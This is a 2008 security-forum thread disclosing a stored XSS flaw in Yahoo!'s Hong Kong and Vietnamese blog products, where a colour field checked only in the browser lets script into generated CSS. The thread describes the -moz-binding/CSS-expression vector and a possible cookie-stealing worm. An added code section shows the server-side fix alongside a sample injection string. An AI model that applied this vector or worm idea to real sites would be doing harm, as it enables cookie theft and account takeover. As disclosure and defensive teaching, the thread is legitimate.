Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Yahoo! HK Blog & Yahoo! 360plus XSS Disclosure
Posted by: nktpro
Date: June 26, 2008 08:07AM

Hi everyone,

Finally, here I am, going to disclose a critical XSS Vulnerability from two of Yahoo! blogging products: Yahoo! Hong Kong Blog (with around half a million users) and the buggy cloned version: Yahoo! 360plus typically for Vietnamese users.

Let me explain why I decided to disclose everything this time even when nothing was fixed by Yahoo! yet. For those who don't have time to read my story, you can skip to the bottom to see the live PoCs.

You may remember last time I discovered an XSS hole in Yahoo! Mail Classic via file attachments and helped them to fix it silently without any full disclosure. Once it was fixed, as always they forgot it, forgot you, not even a single thank-you or credit word anywhere.

A few weeks ago I discovered another serious flaw in their blogging products and immediately sent them an email:

Quote

I've just discovered a highly critical security vulnerability of Yahoo! HK BLOG and Yahoo! 360plus (for Vietnam), which allows any user to inject external javascript file to be executed on his own blog page. Whenever a Yahoo! user visits the blog, his cookie information can be immediately stolen using Cross Site Scripting technique, then used for different purposes depending on the hacker's own target, some of which can be:

- Injecting the same exploiting script on the victim's blog page to compromise other Yahoo! user accounts when they visit his blog. This can automatically generate an extremely powerful botnet throughout the whole blog community.
- Deface the victim's blog page.
- Use phishing technique to get Yahoo! users type in their password.
- Steal the victim's personal information from other Yahoo! services like Yahoo! Mail.
- Target popular blogs with high traffic and create massive DDoS attacks towards other systems.

The hacking process can be absolutely transparent and requires no further interaction from visitors. I've successfully created the PoC (Proof of Concept) which works perfectly with the most popular browsers including Firefox 2, Internet Explorer 6 and 7 fully patched. Since Yahoo! 360plus has the same source code base with Yahoo! HK Blog, the same issue exists on both of the products. Personal information and private documents of every Yahoo! user are put at high risk.

Until this moment, details of the vulnerability are kept privately by myself. Once again, I'm more than willing to help Yahoo! Security Team with all required information in order to fix the issue as soon as possible. I suggest both parties go for the RFPolicy v2.0 (http://www.wiretrip.net/rfp/policy.html), which has some important points I want to emphasize:

1. Yahoo! Security continuously updates me about the fixing progress until the issue is fully resolved.
2. Upon completion of the fix, a news article or an official blog entry from Yahoo! is posted:
- Notify Yahoo! users about the vulnerability and the fix.
- Include the credit for discovery of the issue.
3. I reserve the right to disclose this vulnerability to the public should Yahoo! fail to contact me within 5 days from now.

Clearly you can see my points. All I need is that once they fix it, they let their users know about it in their blog, and put one line of credit for discovery of the issue. That's what a web service company is supposed to do, and that's how the RFPolicy v2.0 is trying to solve the vendor's flaws vs. researcher's credit problem.

And here is exactly what they replied, no better than a lousy, low-class auto response:

Quote

Thank you for sending this to Yahoo!. It will be sent to the correct teams to investigate and if a fix is required, we will contact you and ask you see the issue as resolved as well.

We ask that you send over steps to reproduce the issues you are seeing as well as the URLs of the pages you see it on.

Yahoo! Security Contact

Everyone knows Google has a dedicated page with all the names of the security researchers who helped to report critical security issues. That's all a true security researcher may need when they decide to help, not to destroy. It's just a thank-you, no more than that, no money, nothing. For years Yahoo! took advantage of security researchers who are kind enough to help them fix tons of their stupid security holes "for free" without having even a single credit line in return anywhere. Things were drowned silently and the helpers are forgotten forever. I helped them once for nothing, not a second time:

Quote

Thanks for the reply. However, please focus on the points I've clearly stated. If once again (this should be the second time to me, and probably hundredth to other security community members), Yahoo! ignores giving credit information for discovery of the issues to the researchers in return for the help of reporting critical security vulnerabilities, I will not give any further details. In such case, I prefer to disclose the information to the public instead. Please give me the final answer on that by May 25.

As expected, no more answer from them until now. Again, irresponsibility is what Yahoo! Security is made of.

That explains why I will never report any security issue to them again. Instead, I'll disclose to make a buzz for Yahoo! users that they are (always) at risk.

Well, enough story, here are the PoCs. Please be reminded this is only for reference purposes and I'm definitely not encouraging any actual exploit whatsoever. I am NOT responsible for any damage caused.

Yahoo! Hong Kong Blog:
http://hk.myblog.yahoo.com/hkblog-hacked

Yahoo! 360plus:
http://vn.myblog.yahoo.com/360plus-hacked

They are two blog pages that have been injected with my PoC javascript file. Those PoCs work perfectly with IE 6, IE 7 and Firefox 2.x.

The vector is quite simple indeed. You're allowed to pick custom colors to change the look of your own blog. Surprisingly they only check the validity of the HEX color code using javascript on the client side. There's no filtering on the server side, which allows you to make a simple HTTP request to put whatever you want to be loaded inside the custom CSS file later on. CSS expression for IE, -moz-binding for Firefox 2.x with a bit of String.fromCharCode technique, and that's it. Please refer to the great RSnake Cheat Sheet for details.

This vulnerability can be extremely dangerous if A creates an XSS Worm and injects it into his own blog. When B visits A's blog, his own blog is infected and unintentionally passes the worm to all his friends who visit his blog page later on. In just a day, it's hard to imagine how many Yahoo! accounts' cookies are stolen. Famous stars' blogs are most likely the 1st targeted batch of victims.



Edited 2 time(s). Last edit at 06/26/2008 08:12AM by nktpro.

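The root cause described above is a colour value that is checked only in the browser and then written unvalidated into a server-generated CSS file. The following is an added example (not code from the original post or from Yahoo!) showing the unsafe pattern beside a server-side allowlist fix; the settings object, the defaults and the forged request value are all constructed for illustration.

```javascript
// Server-side allowlist for a custom colour setting, written as a Node.js module.
// The original post reports that only client-side JavaScript validated the HEX code;
// a forged request bypasses that, so the same check must run on the server and
// unvalidated text must never be interpolated into CSS.
const HEX_COLOR = /^#(?:[0-9a-f]{3}|[0-9a-f]{6})$/i;

// Returns the canonical "#rrggbb" form, or null when the value is not a plain hex colour.
function validateHexColor(value) {
  if (typeof value !== 'string') return null;
  const v = value.trim();
  if (!HEX_COLOR.test(v)) return null;
  const hex = v.slice(1).toLowerCase();
  // Expand the 3-digit short form so stored values have one shape.
  const full = hex.length === 3 ? hex.split('').map((c) => c + c).join('') : hex;
  return '#' + full;
}

// Vulnerable pattern (the behaviour the post describes): trusts that the browser
// already validated the value, so anything in the request lands in the stylesheet.
function buildCustomCssUnsafe(settings) {
  return `body { background: ${settings.background}; color: ${settings.text}; }`;
}

// Hardened pattern: every value passes the allowlist, unknown keys are ignored and
// an invalid value falls back to a safe default instead of being echoed into CSS.
function buildCustomCssSafe(settings, defaults = { background: '#ffffff', text: '#000000' }) {
  const out = {};
  for (const key of Object.keys(defaults)) {
    out[key] = validateHexColor(settings[key]) || defaults[key];
  }
  return `body { background: ${out.background}; color: ${out.text}; }`;
}

// Constructed sample of a request body sent without the client-side check: a valid-looking
// colour followed by an extra declaration. Placeholder host; not taken from the original post.
const forgedSettings = {
  background: '#fff; -moz-binding: url(http://example.invalid/x.xml)',
  text: '#000',
};
```

With `forgedSettings`, the unsafe builder emits the extra declaration verbatim while the safe builder emits only the default background.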
Re: Yahoo! HK Blog & Yahoo! 360plus XSS Disclosure
Posted by: thrill
Date: June 26, 2008 12:53PM

Nice find, good job trying to work with these jerks. You're doing the right thing for their users!

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Re: Yahoo! HK Blog & Yahoo! 360plus XSS Disclosure
Posted by: hometown
Date: June 27, 2008 09:38PM

This is really a serious flaw. Yahoo made a big mistake! Hope it can be fixed ASAP.

Re: Yahoo! HK Blog & Yahoo! 360plus XSS Disclosure
Posted by: nktpro
Date: June 29, 2008 08:05AM

Update: Yahoo! seems to have fixed this flaw, just a few days after my disclosure :). Haha, I didn't think their staff visited this forum so often.

Re: Yahoo! HK Blog & Yahoo! 360plus XSS Disclosure
Posted by: asilvermtzion
Date: June 29, 2008 04:39PM

Haha, nice. Did you get any credit?

Re: Yahoo! HK Blog & Yahoo! 360plus XSS Disclosure
Posted by: nktpro
Date: June 30, 2008 08:07AM

@asilvermtzion: Well, obviously not. If I did get a thank-you from them, they would not be Yahoo! :))

Re: Yahoo! HK Blog & Yahoo! 360plus XSS Disclosure
Date: June 30, 2008 12:35PM

Well I for one will give you a thanks and a job well done!

Re: Yahoo! HK Blog & Yahoo! 360plus XSS Disclosure
Posted by: trev
Date: July 03, 2008 04:51AM

@nktpro: I feel your pain. I stopped trying to do responsible disclosure with Yahoo long ago - any reports to them go down a black hole, and there are really lots and lots of issues to report. Even Microsoft is trying to keep security researchers in the loop, but Yahoo is really hopeless.

Re: Yahoo! HK Blog & Yahoo! 360plus XSS Disclosure
Posted by: Malkav
Date: July 03, 2008 06:22AM

all will be solved when turned into MicroHoo! (or Yasoft! or whatever)

you will get neither the patch, nor the security reports. all is well in corpo paradise :) (and yahoo will only be IE7 compatible.)

----------------------------------------------------------------------------------------------------------------

Those that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety.
--Benjamin Franklin
